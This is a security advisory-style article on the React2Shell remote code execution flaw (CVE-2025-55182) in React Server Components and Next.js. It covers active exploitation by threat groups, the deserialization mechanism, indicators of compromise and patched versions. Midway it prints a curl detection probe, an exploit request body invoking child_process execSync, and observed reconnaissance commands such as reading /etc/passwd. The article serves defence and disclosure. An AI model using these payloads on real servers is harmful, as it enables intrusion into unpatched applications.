Multiple threat groups are exploiting the critical React/Nex.js vulnerability

The critical severity vulnerability affecting React Server Components, tracked as CVE-2025-55182 (CVSS score 10.0), dubbed React2Shell is already being exploited. 

Amazon threat intelligence teams detect immediate and very complex exploit attacks:

• Infrastructure associated with Earth Lamia, a China-nexus threat actor known for exploiting web application vulnerabilities to target organizations across Latin America, the Middle East, and Southeast Asia, was observed attempting exploitation within hours of disclosure.
• Infrastructure linked to Jackpot Panda, which primarily targets entities in East and Southeast Asia, was identified conducting scanning and exploitation activities. 

Attack are persistent and methodical. In one instance from IP address 183.6.80.214 attackers spent nearly an hour systematically troubleshooting exploitation attempts, executing 116 total requests while trying multiple exploit payloads, Linux reconnaissance commands, file writes, and attempting to read sensitive system files. Attackers used both automated scanning tools with detection-evasion capabilities such as user agent randomization and were simultaneously exploiting other recent N-day vulnerabilities.

The React2Shell vulnerability exploits an unsafe deserialization flaw in the React "Flight" protocol, which React Server Components use to communicate between server and client. The flaw is in how JavaScript's Event Loop processes asynchronous operations. When the server uses the await command, it hands control to the Event Loop, which automatically looks for a .then() function to execute. The vulnerability allows attackers to attach malicious system commands to this .then property, tricking the Event Loop into executing arbitrary code at the exact moment it attempts to register the callback for the result.

First, the attacker crafts a malicious HTTP POST request containing a specially structured payload that abuses React's object reference system. React uses references like $1 to link pieces of data together during serialization, but the vulnerability allows attackers to reference internal system tools such as the Function Constructor or Node.js built-in modules like vm, child_process, and fs. 

When the server receives the malformed payload, it fails to properly validate the structure during deserialization. This validation failure causes the server to traverse the object prototype chain without performing hasOwnProperty checks, enabling attackers to access dangerous Node.js modules that should never be exposed to client-side code. The malicious object is then automatically "resolved" because it possesses a .then property, appearing to the Event Loop as a legitimate Promise object.

Example Attack Payloads

Basic Detection Probe (Safe Test):

curl -v -k -X POST "http://target-server:3000/" \
  -H "Next-Action: 1337" \
  -F '1="{}"' \
  -F '0=["$1:a:a"]'

This probe attempts to trigger the parser error without executing code. A vulnerable server returns a 500 Internal Server Error containing E{"digest", while a patched server returns 400 Bad Request or ignores the malformed request.

Malicious Exploitation Payload Structure:

POST /_rsc HTTP/1.1
Host: victim.example.com
Content-Type: application/json
Next-Action: $@malicious_payload
 {
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/pwned');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Observed Attack Patterns from Threat Actors:

Reconnaissance commands observed by AWS MadPot honeypot infrastructure:

• whoami - User context enumeration
• id - Permission level identification
• uname -a - System information gathering
• cat /etc/passwd - User account enumeration

File system manipulation attempts:

• echo "compromised" > /tmp/pwned.txt - Write access verification
• Attempts to create webshells in web-accessible directories
• File exfiltration commands targeting sensitive configuration files

Attack Indicators:

• HTTP POST requests to application endpoints with next-action or rsc-action-id headers
• Request bodies containing the $@ pattern sequence
• Request bodies with "status":"resolved_model" JSON patterns
• Multipart/form-data requests where form keys contain both colon (:) delimiters and reference markers ($)
• High volume of requests with these headers from single IP addresses
• Unexpected execution of reconnaissance commands (whoami, id, uname) spawned by Node.js processes
• Suspicious attempts to read /etc/passwd or other system configuration files
• Unusual file writes to /tmp/ directory, particularly files named pwned.txt or similar
• New child processes spawned by React/Next.js application processes
• Outbound network connections initiated by Node.js processes to unexpected destinations
• Sudden spikes in 500 Internal Server Errors on React Server Components endpoints

The vulnerability affects React Server Components in React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack packages. Next.js applications using the App Router feature in versions 14.3.0-canary.77 and later, all 15.x releases, and all 16.x releases are also vulnerable. 

The flaw was initially assigned a separate CVE identifier for Next.js (CVE-2025-66478) with the same maximum CVSS score of 10.0, but this was subsequently rejected by the National Vulnerability Database as a duplicate of CVE-2025-55182. Other frameworks and tools that bundle React Server Components are similarly affected, including Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodJS, and Waku. 

Patched versions are now available and organizations should immediately upgrade to React version 19.2.1, or for Next.js specifically: versions 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, and 15.0.5. 

Cloud infrastructure providers including AWS, Cloudflare, Akamai, Fastly, and Google Cloud have deployed automated protection layers through web application firewall managed rules, with AWS updating its AWSManagedRulesKnownBadInputsRuleSet to version 1.24 or higher. However, these protections are not substitutes for patching, and customers running React or Next.js applications in their own environments such as Amazon EC2 instances, containers, or self-hosted deployments must update vulnerable applications ASAP.

Organizations should treat this as an emergency patching event. 

Update - as of 6th of December 2025, ShadowServer foundation reports that the vulnerability affects over 77,000 IP addresses globally. Active exploitation observed from 181 distinct IPs in the past 24 hours, primarily from the Netherlands, China, and the US. More than 30 organizations have been compromised.

As of 7th of December, a free tool was published to help with detecting and patching the vulnerability.